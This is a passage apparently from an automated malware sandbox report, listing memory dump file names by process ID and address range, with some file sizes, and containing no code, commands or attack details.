                                                                                                                                                                                                                                                                                                                                  • memory/4336-394-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4416-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4500-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4500-265-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    12KB

                                                                                                                                                                                                                                                                                                                                  • memory/4588-356-0x0000020FADD30000-0x0000020FADDFF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    828KB

                                                                                                                                                                                                                                                                                                                                  • memory/4588-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4588-349-0x0000020FADCC0000-0x0000020FADD2F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    444KB

                                                                                                                                                                                                                                                                                                                                  • memory/4600-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4780-373-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4780-376-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    36KB

                                                                                                                                                                                                                                                                                                                                  • memory/4820-412-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4872-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4888-387-0x0000000004F30000-0x0000000005536000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                  • memory/4888-365-0x000000000041A5EA-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4956-347-0x0000000005060000-0x000000000555E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    5.0MB

                                                                                                                                                                                                                                                                                                                                  • memory/4956-296-0x000000000041A772-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/4956-292-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                                                                                                                                  • memory/5012-320-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5024-270-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5060-300-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    128KB

                                                                                                                                                                                                                                                                                                                                  • memory/5060-306-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5060-355-0x0000000004D20000-0x0000000005326000-memory.dmp
                                                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                                                    6.0MB

                                                                                                                                                                                                                                                                                                                                  • memory/5140-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5168-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5212-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5232-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5292-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5368-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5432-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5444-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5516-439-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5540-440-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5592-444-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5656-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5688-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5760-453-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5804-455-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                  • memory/5832-458-0x0000000000000000-mapping.dmp